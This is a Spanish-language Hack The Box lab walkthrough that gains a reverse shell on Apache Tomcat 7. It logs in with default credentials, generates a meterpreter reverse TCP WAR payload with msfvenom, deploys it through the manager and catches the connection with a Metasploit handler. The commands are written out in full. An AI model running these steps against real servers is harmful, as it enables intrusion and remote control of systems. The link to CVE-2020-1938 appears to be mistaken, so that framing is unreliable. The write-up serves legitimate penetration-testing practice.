
Guía paso a paso para la explotación de CVE-2020-1938 (carga arbitraria de JSP a RCE en Apache Tomcat) utilizando msfvenom y Metasploit en un entorno de laboratorio Hack The Box.
CVE-2020-1938 es una vulnerabilidad crítica que afecta a Apache Tomcat desde 9.0.0.M1 hasta 9.0.0.30, 8.5.0 hasta 8.5.50 y 7.0.0 hasta 7.0.99 ⚠️ Esto fue explotado en un laboratorio de Hack The Box.
🔗 Referencia: Entrada NIST NVD
El sitio web tiene credenciales predeterminadas para la función Server Status.
Esta interfaz indica que la versión es Apache Tomcat/7.0.88, arquitectura de 64 bits.
Desde esta interfaz navegamos hasta listar aplicaciones, lo que expone una función de Subida de archivos .war.
En una subida exitosa, el archivo .war se ejecuta en /directorio/nombrearchivo
La investigación sobre la versión de Apache Tomcat confirmó la vulnerabilidad a CVE-2020-1938
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
Usando msfvenom, que es un generador de cargas útiles de metasploit, generamos nuestra carga útil exploit.war.
Después de la generación del archivo, ingrese al archivo y encuentre el nombre del archivo .jsp, p. ej., gcvxdtmxvw.jsp, y guárdelo para más adelante.
msfconsole
use exploit/multi/handler
Set LHOST 10.10.14.3
Set LPORT 3004
Usando msfconsole configuramos un listener que espera a que se ejecute nuestra carga útil.


Subimos nuestra imagen en la sección de despliegue (deploy), después de lo cual actualizamos la pantalla y encontramos que el archivo se ha subido exitosamente. Para finalizar la explotación debemos navegar a la ruta ip/hacked/gcvxdtmxvw.jsp.

Esto cuelga la solicitud, sin embargo podemos ver localmente en nuestra máquina que tenemos una conexión inversa.